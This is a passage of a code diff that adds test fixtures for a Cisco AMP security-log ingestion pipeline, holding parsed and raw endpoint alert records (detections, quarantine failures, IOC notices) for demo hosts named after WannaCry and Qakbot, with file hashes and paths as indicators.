Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204905956803000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204905956802580",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094108755Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419204905956802579",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094110607Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204901661835000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419204901661835277",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094112459Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204901661835000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204897366867976",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
new file mode 100644
index 00000000000..9842f3cbe93
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
@@ -0,0 +1,49 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 